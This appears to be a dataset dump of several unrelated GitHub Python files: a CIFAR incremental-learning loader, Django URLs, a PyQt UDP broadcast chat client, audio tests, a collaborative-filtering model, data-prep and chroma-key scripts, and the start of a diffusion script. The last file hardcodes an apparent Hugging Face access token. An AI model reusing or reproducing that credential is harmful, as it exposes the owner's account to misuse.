self._get_loader(x_train, y_train_fine, y_train_coarse, train_memory_flags, mode=\"train\")\n val_loader = self._get_loader(x_val, y_val_fine, y_val_coarse, val_memory_flags,\n mode=\"train\") if len(x_val) > 0 else None\n test_loader = self._get_loader(x_test, y_test_fine, y_test_coarse, np.zeros((x_test.shape[0],)), mode=\"test\")\n\n task_info = {\n \"min_class\": min_class,\n \"max_class\": max_class,\n \"total_n_classes\": sum(self.increments),\n \"increment\": nb_new_classes, # self.increments[self._current_task],\n \"task\": self._current_task,\n \"max_task\": len(self.increments),\n \"n_train_data\": x_train.shape[0],\n \"n_test_data\": x_test.shape[0],\n \"fine_class_num\": self.train_fine_nums_inc,\n \"coarse_class_num\": self.train_coarse_nums_inc,\n }\n\n self._current_task += 1\n\n return task_info, train_loader, val_loader, test_loader\n\n def _add_memory(self, x, y_fine, y_coarse, data_memory, fine_targets_memory, coarse_targets_memory):\n if self._onehot: # Need to add dummy zeros to match the number of targets:\n fine_targets_memory = np.concatenate(\n (\n fine_targets_memory,\n np.zeros((fine_targets_memory.shape[0], self.increments[self._current_task]))\n ),\n axis=1\n )\n coarse_targets_memory = np.concatenate(\n (\n coarse_targets_memory,\n np.zeros((coarse_targets_memory.shape[0], self.increments[self._current_task]))\n ),\n axis=1\n )\n memory_flags = np.concatenate((np.zeros((x.shape[0],)), np.ones((data_memory.shape[0],))))\n\n x = np.concatenate((x, data_memory))\n y_fine = np.concatenate((y_fine, fine_targets_memory))\n y_coarse = np.concatenate((y_coarse, coarse_targets_memory))\n\n return x, y_fine, y_coarse, memory_flags\n\n def get_custom_loader(\n self, class_indexes, memory=None, mode=\"test\", data_source=\"train\", sampler=None\n ):\n \"\"\"Returns a custom loader.\n\n :param class_indexes: A list of class indexes that we want.\n :param mode: Various mode for the transformations applied on it.\n :param data_source: Whether to fetch from the train, val, or test set.\n :return: The raw data and a loader.\n \"\"\"\n if not isinstance(class_indexes, list): # TODO: deprecated, should always give a list\n class_indexes = [class_indexes]\n\n if data_source == \"train\":\n x, y_fine, y_coarse = self.data_train, self.fine_targets_train, self.coarse_targets_train\n elif data_source == \"val\":\n x, y_fine, y_coarse = self.data_val, self.fine_targets_val, self.coarse_targets_val\n elif data_source == \"test\":\n x, y_fine, y_coarse = self.data_test, self.fine_targets_test, self.coarse_targets_test\n else:\n raise ValueError(\"Unknown data source <{}>.\".format(data_source))\n\n data, fine_targets, coarse_targets = [], [], []\n for class_index in class_indexes:\n class_data, fine_class_targets, coarse_class_targets = self._select(\n x, y_fine, y_coarse, low_range=class_index, high_range=class_index + 1\n )\n data.append(class_data)\n fine_targets.append(fine_class_targets)\n coarse_targets.append(coarse_class_targets)\n\n if len(data) == 0:\n assert memory is not None\n else:\n data = np.concatenate(data)\n fine_targets = np.concatenate(fine_targets)\n coarse_targets = np.concatenate(coarse_targets)\n\n if (not isinstance(memory, tuple) and\n memory is not None) or (isinstance(memory, tuple) and memory[0] is not None):\n if len(data) > 0:\n data, fine_targets, coarse_targets, memory_flags = self._add_memory(data, fine_targets, coarse_targets, *memory)\n else:\n data, targets = memory\n memory_flags = np.ones((data.shape[0],))\n else:\n memory_flags = np.zeros((data.shape[0],))\n\n return data, self._get_loader(\n data, fine_targets, coarse_targets, memory_flags, shuffle=False, mode=mode, sampler=sampler\n )\n\n def get_memory_loader(self, data, fine_targets, coarse_targets):\n return self._get_loader(\n data, fine_targets, coarse_targets, np.ones((data.shape[0],)), shuffle=True, mode=\"train\"\n )\n\n def _select(self, x, y_fine, y_coarse, low_range=0, high_range=0):\n idxes = np.where(np.logical_and(y_fine >= low_range, y_fine < high_range))[0]\n return x[idxes], y_fine[idxes], y_coarse[idxes]\n\n def get_class_nums(self, y_fine, y_coarse):\n return len(np.unique(y_fine)), list(np.unique(y_coarse))\n\n def _get_loader(self, x, y_fine, y_coarse, memory_flags, shuffle=True, mode=\"train\", sampler=None):\n if mode == \"train\":\n trsf = transforms.Compose([*self.train_transforms, *self.common_transforms])\n elif mode == \"test\":\n trsf = transforms.Compose([*self.test_transforms, *self.common_transforms])\n elif mode == \"flip\":\n trsf = transforms.Compose(\n [\n transforms.RandomHorizontalFlip(p=1.), *self.test_transforms,\n *self.common_transforms\n ]\n )\n else:\n raise NotImplementedError(\"Unknown mode {}.\".format(mode))\n\n sampler = sampler or self._sampler\n if sampler is not None and mode == \"train\":\n logger.info(\"Using sampler {}\".format(sampler))\n sampler = sampler(y_fine, memory_flags, batch_size=self._batch_size, **self._sampler_config)\n batch_size = 1\n else:\n sampler = None\n batch_size = self._batch_size\n\n return DataLoader(\n DummyDataset(x, y_fine, y_coarse, memory_flags, trsf, open_image=self.open_image),\n batch_size=batch_size,\n shuffle=shuffle if sampler is None else False,\n num_workers=self._workers,\n batch_sampler=sampler\n )\n\n def _setup_data(\n self,\n dataset,\n random_order=False,\n class_order=None,\n seed=1,\n increment=10,\n validation_split=0.,\n initial_increment=None,\n data_path=\"data\"\n ):\n # FIXME: handles online loading of images\n self.data_train, self.fine_targets_train, self.coarse_targets_train = [], [], []\n self.data_test, self.fine_targets_test, self.coarse_targets_test = [], [], []\n self.data_val, self.fine_targets_val, self.coarse_targets_val = [], [], []\n self.fine_increments = []\n self.coarse_increments = []\n self.fine_class_order = []\n self.coarse_class_order = []\n self.increments = []\n\n train_dataset = dataset().base_dataset(data_path, train=True, download=True)\n test_dataset = dataset().base_dataset(data_path, train=False, download=True)\n\n x_train = train_dataset.data\n y_train_fine, y_train_coarse = np.array(train_dataset.fine_targets), np.array(train_dataset.coarse_targets)\n\n x_val, y_val_fine, y_val_coarse, x_train, y_train_fine, y_train_coarse = self._split_per_class(\n x_train, y_train_fine, y_train_coarse, validation_split\n )\n\n x_test = test_dataset.data\n y_test_fine, y_test_coarse = np.array(test_dataset.fine_targets), np.array(test_dataset.coarse_targets)\n fine_order = dataset.class_order\n logger.info(\"Dataset {}: class ordering: {}.\".format(dataset.__name__, fine_order))\n self.fine_class_order = fine_order\n coarse_order = dataset.coarse_class_order\n self.coarse_class_order = coarse_order\n if initial_increment is None:\n nb_steps = len(fine_order) / increment\n remainder = len(fine_order) - int(nb_steps) * increment\n\n if not nb_steps.is_integer():\n logger.warning(\n f\"THe last step will have sligthly less sample ({remainder} vs {increment}).\"\n )\n self.increments = [increment for _ in range(int(nb_steps))]\n self.increments.append(remainder)\n else:\n self.increments = [increment for _ in range(int(nb_steps))]\n else:\n self.increments = [initial_increment]\n\n nb_steps = (len(fine_order) - initial_increment) / increment\n remainder = (len(fine_order) - initial_increment) - int(nb_steps) * increment\n if not nb_steps.is_integer():\n logger.warning(\n f\"THe last step will have sligthly less sample ({remainder} vs {increment}).\"\n )\n self.increments.extend([increment for _ in range(int(nb_steps))])\n self.increments.append(remainder)\n else:\n self.increments.extend([increment for _ in range(int(nb_steps))])\n\n y_train_fine = self._map_new_class_index(y_train_fine, fine_order)\n y_val_fine = self._map_new_class_index(y_val_fine, fine_order)\n y_test_fine = self._map_new_class_index(y_test_fine, fine_order)\n\n y_train_coarse = self._map_new_class_index(y_train_coarse, coarse_order)\n y_val_coarse = self._map_new_class_index(y_val_coarse, coarse_order)\n y_test_coarse = self._map_new_class_index(y_test_coarse, coarse_order)\n\n self.data_train = x_train\n self.fine_targets_train = y_train_fine\n self.coarse_targets_train = y_train_coarse\n\n self.data_val = x_val\n self.fine_targets_val = y_val_fine\n self.coarse_targets_val = y_val_coarse\n\n self.data_test = x_test\n self.fine_targets_test = y_test_fine\n self.coarse_targets_test = y_test_coarse\n\n @staticmethod\n def _map_new_class_index(y, order):\n \"\"\"Transforms targets for new class order.\"\"\"\n return np.array(list(map(lambda x: order.index(x), y)))\n\n @staticmethod\n def _split_per_class(x, y_fine, y_coarse, validation_split=0.):\n \"\"\"Splits train data for a subset of validation data.\n\n Split is done so that each class has a much data.\n \"\"\"\n shuffled_indexes = np.random.permutation(x.shape[0])\n x = x[shuffled_indexes]\n y_fine = y_fine[shuffled_indexes]\n y_coarse = y_coarse[shuffled_indexes]\n\n x_val, y_val_fine, y_val_coarse = [], [], []\n x_train, y_train_fine, y_train_coarse = [], [], []\n\n for class_id in np.unique(y_fine):\n class_indexes = np.where(y_fine == class_id)[0]\n nb_val_elts = int(class_indexes.shape[0] * validation_split)\n\n val_indexes = class_indexes[:nb_val_elts]\n train_indexes = class_indexes[nb_val_elts:]\n\n x_val.append(x[val_indexes])\n y_val_fine.append(y_fine[val_indexes])\n y_val_coarse.append(y_coarse[val_indexes])\n x_train.append(x[train_indexes])\n y_train_fine.append(y_fine[train_indexes])\n y_train_coarse.append(y_coarse[train_indexes])\n\n x_train = np.concatenate(x_train)\n y_train_fine, y_train_coarse = np.concatenate(y_train_fine), np.concatenate(y_train_coarse)\n\n x_val = np.concatenate(x_val)\n y_val_fine, y_val_coarse = np.concatenate(y_val_fine), np.concatenate(y_val_coarse)\n\n return x_val, y_val_fine, y_val_coarse, x_train, y_train_fine, y_train_coarse\n\n\nclass DummyDataset(torch.utils.data.Dataset):\n\n def __init__(self, x, y_fine, y_coarse, memory_flags, trsf, open_image=False):\n self.x, self.y_fine, self.y_coarse = x, y_fine, y_coarse\n self.memory_flags = memory_flags\n self.trsf = trsf\n self.open_image = open_image\n\n assert x.shape[0] == y_fine.shape[0] == y_coarse.shape[0] == memory_flags.shape[0]\n\n def __len__(self):\n return self.x.shape[0]\n\n def __getitem__(self, idx):\n x, y_fine, y_coarse = self.x[idx], self.y_fine[idx], self.y_coarse[idx]\n memory_flag = self.memory_flags[idx]\n\n if self.open_image:\n img = Image.open(x).convert(\"RGB\")\n else:\n img = Image.fromarray(x.astype(\"uint8\"))\n\n img = self.trsf(img)\n return {\"inputs\": img, \"fine_targets\": y_fine, \"coarse_targets\": y_coarse, \"memory_flags\": memory_flag}\n\n\ndef _get_datasets(dataset_names):\n return [_get_dataset(dataset_name) for dataset_name in dataset_names.split(\"-\")]\n\n\ndef _get_dataset(dataset_name):\n dataset_name = dataset_name.lower().strip()\n\n if dataset_name == \"cifar10\":\n return iCIFAR10\n elif dataset_name == \"cifar100\":\n return iCIFAR100\n else:\n raise NotImplementedError(\"Unknown dataset {}.\".format(dataset_name))\n\n","repo_name":"Piang321/LHY-ILWP","sub_path":"inclearn/lib/data/incdataset.py","file_name":"incdataset.py","file_ext":"py","file_size_in_byte":19003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2114717893","text":"from django.urls import path\n\nfrom PBI.views import backlog_view, add_view, edit_view, delete_view, create_sprint, add_PBI_to_current_sprint, movePBIdown, movePBIup\n\nurlpatterns = [\n path('', backlog_view, name='backlog'),\n path('add/',add_view, name='add'),\n path('edit/',edit_view, name='edit'),\n path('delete/',delete_view, name='delete'),\n path('createSprint/', create_sprint, name='create_sprint'),\n path('addPBIToCurrentSprint/', add_PBI_to_current_sprint, name=\"add_PBI_to_current_sprint\"),\n path('movePBIup/', movePBIup, name='movePBIup'),\n path('movePBIdown/', movePBIdown, name='movePBIdown'),\n]\n","repo_name":"lapraskwan/COMP3297-BackTrack","sub_path":"BackTrack/PBI/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37807434722","text":"from PyQt5.QtWidgets import QApplication, QDialog, QScrollBar, QWidget\nfrom mess.threded_loader import *\nfrom mess.gui import Ui_Dialog\nfrom mess.help_com import Ui_Help_com\nimport json\nimport netifaces as ni\nimport socket\nimport os\n\n\ndef get_broadcasts_interfaces():\n broadcasts_list = []\n for e in ni.interfaces():\n try:\n broadcasts_list.append(ni.ifaddresses(e).get(2)[0].get(\"broadcast\"))\n except TypeError:\n None\n return broadcasts_list\n\n\nclass help_dialog(Ui_Help_com, QDialog):\n def __init__(self, parent=None):\n super(help_dialog, self).__init__(parent)\n self.setupUi(self)\n\n\nclass Window(Ui_Dialog, QDialog):\n def __init__(self):\n super(Window, self).__init__(None, QtCore.Qt.WindowCloseButtonHint)\n self.setupUi(self)\n self.ip_broadcast = \"127.255.255.255\"\n self.my_ip = \"127.0.0.1\"\n self.update_info()\n\n with open(os.path.expanduser(\"~/.virtualabinfo\"), \"r\") as json_file:\n data = json_file.read()\n data = data.replace('u\"', '\"')\n with open(\"Output\", \"w\") as text_file:\n text_file.write(data)\n with open(\"Output\", \"r\") as file:\n user_json = json.load(file)\n if \"student\" in user_json:\n self.user_name = user_json[\"student\"][\"name\"] + user_json[\"student\"][\"surname\"]\n try:\n self.set_default_ip(user_json[\"student\"][\"ip\"])\n except Exception:\n pass\n else:\n self.user_name = user_json[\"professor\"][\"name\"] + user_json[\"professor\"][\"surname\"]\n try:\n self.set_default_ip(user_json[\"professor\"][\"students\"][0][\"professorip\"])\n except Exception:\n pass\n\n self.sender = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\n self.sender.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.sender.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\n\n self.flag = 0\n\n self.button_send.clicked.connect(self.send)\n self.button_ip.clicked.connect(self.change_ip)\n\n scroll_bar = QScrollBar(self)\n scroll_bar.setStyleSheet(\"background : lightgreen;\")\n self.list_chat.setVerticalScrollBar(scroll_bar)\n\n self.button_synchronize.clicked.connect(self.update_info)\n\n self.help_button.clicked.connect(self.pop_up_help)\n\n def pop_up_help(self):\n ex = help_dialog(self)\n ex.show()\n\n def load_chat(self):\n self.list_chat.clear()\n file_info = open('/etc/virtualab/vm-communicator/mess/chat.txt', 'r')\n lines = file_info.readlines()\n iterator = 1\n for line in lines:\n if iterator % 2 == 1:\n sender_ip = json.loads(line).get(\"user_ip\")\n broadcast = json.loads(line).get(\"broadcast\")\n sender = json.loads(line).get(\"sender\")\n else:\n if str(broadcast) == self.ip_broadcast:\n if sender_ip == self.my_ip:\n item = QListWidgetItem(\"-- Me --\\n\" + line.replace('\\\\n', '\\n'))\n item.setForeground(QtCore.Qt.blue)\n item.setTextAlignment(QtCore.Qt.AlignLeft)\n else:\n item = QListWidgetItem(\"-- \" + sender + \" --\\n\" + line.replace('\\\\n', '\\n'))\n item.setForeground(QtCore.Qt.black)\n item.setTextAlignment(QtCore.Qt.AlignLeft)\n self.list_chat.addItem(item)\n self.list_chat.scrollToBottom()\n iterator += 1\n\n def send(self):\n message = self.line_edit_messege.toPlainText()\n message_json = {\"message\": message, \"broadcast\": self.ip_broadcast, \"type\": \"communicator\",\n \"sender\": self.user_name}\n try:\n self.sender.sendto(json.dumps(message_json).encode(\"utf-8\"), (self.ip_broadcast, 37021))\n item = QListWidgetItem(\"-- Me --\\n\" + message)\n item.setForeground(QtCore.Qt.blue)\n item.setTextAlignment(QtCore.Qt.AlignLeft)\n self.list_chat.addItem(item)\n self.line_edit_messege.setText(\"\")\n except socket.error:\n self.ip_broadcast = \"127.255.255.255\"\n self.my_ip = \"127.0.0.1\"\n self.load_broad_ip()\n\n def change_ip(self):\n if self.combo_box_ip.currentText() == \"127.255.255.255\":\n self.ip_broadcast = \"127.255.255.255\"\n self.my_ip = \"127.0.0.1\"\n else:\n for e in ni.interfaces():\n if ni.ifaddresses(e).get(2)[0].get(\"broadcast\") == self.combo_box_ip.currentText():\n self.ip_broadcast = self.combo_box_ip.currentText()\n self.my_ip = ni.ifaddresses(e).get(2)[0].get(\"addr\")\n break\n self.load_chat()\n self.update_info()\n\n def set_default_ip(self, ip):\n if ip == \"127.0.0.1\":\n self.ip_broadcast = \"127.255.255.255\"\n self.my_ip = \"127.0.0.1\"\n else:\n for e in ni.interfaces():\n if ni.ifaddresses(e).get(2)[0].get(\"addr\") == ip:\n self.ip_broadcast = ni.ifaddresses(e).get(2)[0].get(\"broadcast\")\n self.my_ip = ni.ifaddresses(e).get(2)[0].get(\"addr\")\n self.combo_box_ip.setCurrentText(self.ip_broadcast)\n break\n self.load_chat()\n self.label_info.setText(str(\"Your ip: \" + self.my_ip + \" | Current broadcast: \" + self.ip_broadcast))\n\n def load_broad_ip(self):\n interfaces = get_broadcasts_interfaces()\n interfaces = list(dict.fromkeys(interfaces))\n self.combo_box_ip.clear()\n if \"127.255.255.255\" in interfaces:\n interfaces.remove(\"127.255.255.255\")\n self.combo_box_ip.addItem(\"127.255.255.255\")\n for e in interfaces:\n if e is not None:\n self.combo_box_ip.addItem(e)\n self.combo_box_ip.setCurrentText(self.ip_broadcast)\n\n def update_info(self):\n self.load_broad_ip()\n self.label_info.setText(str(\"Your ip: \" + self.my_ip + \" | Current broadcast: \" + self.ip_broadcast))\n self.load_chat()\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n\n window = Window()\n\n window.load_chat()\n thread_listening = ThreadedLoader(window)\n thread_listening.start()\n\n window.show()\n app.exec_()\n\n thread_listening.kill()\n thread_listening.join()\n","repo_name":"wranidlo/broadcast_sender_receiver","sub_path":"communicator_main.py","file_name":"communicator_main.py","file_ext":"py","file_size_in_byte":6594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10699651047","text":"from swig_test_utils import *\nimport time, fifelog\n\nclass TestAudio(unittest.TestCase):\n\t\n\tdef setUp(self):\n\t\tself.engine = getEngine(True)\n\t\tself.soundmanager = self.engine.getSoundManager()\n\t\tself.log = fifelog.LogManager(self.engine, promptlog=True, filelog=False)\n\t\tself.log.setVisibleModules('pool', 'audio')\n\t\tself.soundmanager.init()\n\n\tdef tearDown(self):\n\t\tself.engine.destroy()\n\t\tdel self.log\n\t\n\tdef testLeftRight(self):\n\t\tsound = self.soundmanager.createEmitter()\n\t\tid = self.engine.getSoundClipPool().addResourceFromFile('tests/data/left_right_test.ogg')\n\t\tsound.setSoundClip(id)\n\t\tsound.setLooping(True)\n\t\tsound.play()\n\t\ttime.sleep(3);\n\t\n\tdef test2Streams(self):\n\t\tem = self.soundmanager.createEmitter()\n\t\tsound = self.soundmanager.createEmitter()\n\t\tid = self.engine.getSoundClipPool().addResourceFromFile('tests/data/left_right_test.ogg')\n\t\tsound.setSoundClip(id)\n\t\tsound.setLooping(True)\n\t\tsound.setCursor(fife.SD_TIME_POS, 5)\n\t\tem.setSoundClip(id)\n\t\tem.setGain(0.7)\n\t\tem.play()\n\t\tsound.play()\n\t\ttime.sleep(3);\n\nTEST_CLASSES = [TestAudio]\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"karottenreibe/FIFE","sub_path":"tests/swig_tests/audio_tests.py","file_name":"audio_tests.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"8872944770","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 9 21:15:03 2018\n\n@author: 10433\n\"\"\"\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\nclass collaborative_filtering(object):\n def __init__(self,num_feature,a=0.01):\n self.num_feature=num_feature\n self.items_feature=None\n self.users_feature=None\n self.pred=None\n self.alpha=a\n self.Y=None\n self.R=None \n self.num_iteration=0\n self.print_loss=True\n self.regular=0\n self.cv_rate=0\n self.train_loss=None\n self.cv_loss=None\n self.cv=None\n self.loss_ploy=True\n \n #生成特征\n def create_feature(self,num_items,num_users):\n #self.items_feature=np.random.rand(num_items,self.num_feature)\n self.items_feature=np.zeros([num_items,self.num_feature])\n self.items_feature[:,0]=1\n \n self.users_feature=np.random.rand(num_users,self.num_feature)\n \n #设置验证集,注意选取验证集时避免交叉集为空,而且尽量选取密集的位置 \n def set_cv(self,cv_rate):\n self.cv_rate=cv_rate\n num_cv=int(self.cv_rate*(self.Y.shape[0]*self.Y.shape[1]-np.sum(np.isnan(self.Y))))\n self.cv=np.zeros([self.Y.shape[0],self.Y.shape[1]])\n for i in range(num_cv):\n items_location=random.randint(0,self.Y.shape[0]-1)\n users_location=random.randint(0,self.Y.shape[1]-1)\n random_value=self.Y[items_location,users_location]\n while random_value==0:\n items_location=random.randint(0,self.Y.shape[0]-1)\n users_location=random.randint(0,self.Y.shape[1]-1)\n random_value=self.Y[items_location,users_location] \n self.cv[items_location,users_location]=self.Y[items_location,users_location]\n self.Y[items_location,users_location]=0\n \n \n \n def output_score(self,score):\n score=score\n print(score)\n \n #设置参数\n def set_parameter(self,parameter):\n self.parameter=parameter\n for para in self.parameter:\n setattr(self,para,self.parameter[para])\n \n #训练\n def fit(self,Y):\n #创建特征\n self.create_feature(Y.shape[0],Y.shape[1])\n self.Y=Y\n #创建\n self.R=abs(np.isnan(self.Y).astype(int)-1)\n# self.R_users_num=self.R.sum(1)\n# self.R_items_num=self.R.sum(0)\n# for i in range(self.num_feature-1):\n# self.R_users_num=np.column_stack((self.R_users_num,self.R.sum(1)))\n# self.R_items_num=np.column_stack((self.R_items_num,self.R.sum(0))) \n \n self.Y[np.isnan(self.Y)]=0\n #创建测试集\n self.set_cv(self.cv_rate)\n cv_R=(self.cv>0).astype(int)\n self.R=self.R+(self.cv==0).astype(int)\n self.R[self.R<2]=0\n self.R[self.R==2]=1\n self.R_users_num=self.R.sum(1)\n self.R_items_num=self.R.sum(0)\n for i in range(self.num_feature-1):\n self.R_users_num=np.column_stack((self.R_users_num,self.R.sum(1)))\n self.R_items_num=np.column_stack((self.R_items_num,self.R.sum(0))) \n \n \n \n \n self.pred=np.dot(self.items_feature,self.users_feature.T)\n self.diff=(self.pred-self.Y)*self.R\n self.loss=np.sum(self.diff**2)/2+self.regular*np.sum(self.items_feature*self.items_feature)/2+\\\n self.regular*np.sum(self.users_feature*self.users_feature)/2\n \n if self.loss_ploy:\n fig=plt.figure()\n ax=fig.add_subplot(1,1,1)\n num_i=[]\n train_loss_plot=[]\n cv_loss_plot=[]\n ax.plot(num_i,train_loss_plot,c='b',marker='.',linewidth=1.0,label=\"train_loss\")\n ax.plot(num_i,cv_loss_plot,c='r',marker='.',linewidth=1.0,label=\"cv_loss\")\n plt.legend()\n plt.title('loss') \n for i in range(self.num_iteration): \n self.items_feature=(1-self.alpha*self.regular)*self.items_feature-\\\n self.alpha*np.dot(self.diff,self.users_feature)/self.R_users_num\n self.users_feature=(1-self.alpha*self.regular)*self.users_feature-\\\n self.alpha*np.dot(self.diff.T,self.items_feature)/self.R_items_num\n \n self.pred=np.dot(self.items_feature,self.users_feature.T)\n \n self.diff=self.pred-self.Y\n self.diff=(self.pred-self.Y)*self.R\n self.loss=np.sum(self.diff**2)/2+self.regular*np.sum(self.items_feature*self.items_feature)/2+\\\n self.regular*np.sum(self.users_feature*self.users_feature)/2 \n #打印train损失值\n self.train_loss=self.loss/len(self.R[self.R==1])\n cv_diff=(self.pred-self.cv)*cv_R\n self.cv_loss=np.sum(cv_diff**2)/len(cv_R[cv_R==1]) \n \n print(u'训练集损失:')\n self.output_score(self.train_loss)\n print(u'测试集损失:')\n self.output_score(self.cv_loss) \n \n if self.loss_ploy:\n num_i.append(i)\n train_loss_plot.append(self.train_loss)\n cv_loss_plot.append(self.cv_loss)\n if (i % 99)==0:\n pass\n ax.plot(num_i,train_loss_plot,c='b',marker='.',linewidth=1.0,label=\"train_loss\")\n ax.plot(num_i,cv_loss_plot,c='r',marker='.',linewidth=1.0,label=\"cv_loss\")\n plt.pause(0.001)\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n","repo_name":"JJA12138/cf","sub_path":"Collaborative_filtering/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28513748425","text":"from __future__ import print_function\nimport tensorflow as tf\nimport numpy as np\nimport math as math\nimport argparse\n\n\n\n#\n# parser = argparse.ArgumentParser()\n# parser.add_argument('dataset')\n# args = parser.parse_args()\n\nprint(\"first\")\nexit\ndef file_len(fname):\n with open(fname) as f:\n for i, l in enumerate(f):\n pass\n return i + 1\n\nFLAG = 'make_test'\nNUMBER_CLASSES = 22\nskip_header_lines = 0;\n\nBASE_PATH = '../data/Walking_dataset/'\nDATA_PATH = '../data/Walking_dataset/data_ori/'\nTRAIN_PATH = BASE_PATH + 'train/' \nTEST_PATH = BASE_PATH + 'test/' \n\nUSER_NUMBER = '2'\nfilename = DATA_PATH + USER_NUMBER + '.csv'\n\nimport csv\ndef read_file_csv (filename):\n with open(filename, 'rb') as f:\n reader = csv.reader(f)\n your_list = list(reader)\n return your_list\n\nfull_data = read_file_csv(filename)\n\nthefile1 = open(TRAIN_PATH + '/Inertial Signals/' + 'body_acc_x_train.txt', 'a+')\nthefile2 = open(TRAIN_PATH + '/Inertial Signals/' + 'body_acc_y_train.txt', 'a+')\nthefile3 = open(TRAIN_PATH + '/Inertial Signals/' + 'body_acc_z_train.txt', 'a+')\n\nthefile4 = open(TEST_PATH + '/Inertial Signals/' + 'body_acc_x_test.txt', 'a+')\nthefile5 = open(TEST_PATH + '/Inertial Signals/' + 'body_acc_y_test.txt', 'a+')\nthefile6 = open(TEST_PATH + '/Inertial Signals/' + 'body_acc_z_test.txt', 'a+')\n\nthefile_y_train = open(TRAIN_PATH + 'y_train.txt', 'a+')\nthefile_y_test = open(TEST_PATH + 'y_test.txt', 'a+')\n\n\nprint(file_len(filename))\nprint(FLAG)\nfor m in range(NUMBER_CLASSES):\n m = m + 1\n if( FLAG == 'make_train'):\n filename = DATA_PATH + str(m) + '.csv'\n else:\n filename = DATA_PATH + str(m) + '_test.csv'\n\n full_data = read_file_csv(filename)\n for j in range(file_len(filename)):\n if(j/127 == j%127):\n if( FLAG == 'make_train'):\n thefile_y_train.write(\"%s \\n\" %m )\n else:\n thefile_y_test.write(\"%s \\n\" %m )\n if(j==0):\n if( FLAG == 'make_train'):\n thefile1.write(\"%s\" %full_data[j][1])\n thefile2.write(\"%s\" %full_data[j][2])\n thefile3.write(\"%s\" %full_data[j][3])\n else:\n thefile4.write(\"%s\" %full_data[j][1])\n thefile5.write(\"%s\" %full_data[j][2])\n thefile6.write(\"%s\" %full_data[j][3])\n else:\n if( FLAG == 'make_train'):\n thefile1.write(\"\\n %s\" %full_data[j][1])\n thefile2.write(\"\\n %s\" %full_data[j][2])\n thefile3.write(\"\\n %s\" %full_data[j][3])\n else:\n thefile4.write(\"\\n %s\" %full_data[j][1])\n thefile5.write(\"\\n %s\" %full_data[j][2])\n thefile6.write(\"\\n %s\" %full_data[j][3])\n else:\n if( FLAG == 'make_train'):\n thefile1.write(\" %s\" %full_data[j][1])\n thefile2.write(\" %s\" %full_data[j][2])\n thefile3.write(\" %s\" %full_data[j][3])\n else:\n thefile4.write(\" %s\" %full_data[j][1])\n thefile5.write(\" %s\" %full_data[j][2])\n thefile6.write(\" %s\" %full_data[j][3])\n if( FLAG == 'make_train'):\n thefile1.write(\" \\n\")\n thefile2.write(\" \\n\")\n thefile3.write(\" \\n\")\n else:\n thefile4.write(\" \\n\")\n thefile5.write(\" \\n\")\n thefile6.write(\" \\n\")\n","repo_name":"TrinhQuocNguyen/CNNRNN","sub_path":"walking_module123/generate_data.py","file_name":"generate_data.py","file_ext":"py","file_size_in_byte":3447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11154242395","text":"import sys, cv2, numpy as np\n\n#cap1 = cv2.VideoCapture('./videos/blue_src.mp4')\ncap1 = cv2.VideoCapture('./videos/green_src.mp4')\nif not cap1.isOpened():\n print('video1 open failed!!!')\n sys.exit() \n\ncap2 = cv2.VideoCapture('./videos/monkey2.avi')\nif not cap2.isOpened():\n print('video2 open failed!!!')\n sys.exit() \n\nw = round(cap1.get(cv2.CAP_PROP_FRAME_WIDTH))\nh = round(cap1.get(cv2.CAP_PROP_FRAME_HEIGHT))\n\nframe_cnt1 = round(cap1.get(cv2.CAP_PROP_FRAME_COUNT))\nframe_cnt2 = round(cap2.get(cv2.CAP_PROP_FRAME_COUNT))\n\nprint('frame_cnt1 : ', frame_cnt1)\nprint('frame_cnt2 : ', frame_cnt2)\n\nfps = cap1.get(cv2.CAP_PROP_FPS)\n\n# 두 프레임 사이의 간격\ndelay = int(1000 / fps)\n\n# 합성플레그\ncomposit_flag = False\n\n#\nwhile True:\n ret1, frame1 = cap1.read()\n\n if not ret1:\n break\n\n if composit_flag:\n ret2, frame2 = cap2.read()\n \n if not ret2:\n break\n \n # frmae1 크기로 사이즈 조정\n frame2 = cv2.resize(frame2, (w,h))\n \n # 배경 영역을 검출하여 합성\n hsv = cv2.cvtColor(frame1, cv2.COLOR_BGR2HSV)\n\n # mask = cv2.inRange(hsv, (100,150,0), (125,255,255))\n mask = cv2.inRange(hsv, (40,150,0), (60,255,255))\n\n cv2.copyTo(frame2, mask, frame1)\n\n cv2.imshow('frame', frame1)\n key = cv2.waitKey(delay)\n\n # spacebar를 이용해서 플래그 toggle\n if key == ord(' '):\n composit_flag = not composit_flag\n elif key == 27:\n break\n\n\ncap1.release()\ncap2.release()\ncv2.destroyAllWindows()\n\n\n\n\n\n","repo_name":"tmd9936/ys_study","sub_path":"comVision/chroma_key.py","file_name":"chroma_key.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10402107635","text":"from typing import Optional, Union, Tuple, List, Callable, Dict\nimport torch\nfrom diffusers import StableDiffusionPipeline\nimport torch.nn.functional as nnf\nimport numpy as np\nimport abc\nimport ptp_utils\nimport seq_aligner\nimport cv2\nimport os\nimport math\nimport torch.nn as nn\n\nos.environ[\"http_proxy\"] = \"http://127.0.0.1:7890\"\nos.environ[\"https_proxy\"] = \"http://127.0.0.1:7890\"\n\n\nMY_TOKEN = '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'\nLOW_RESOURCE = 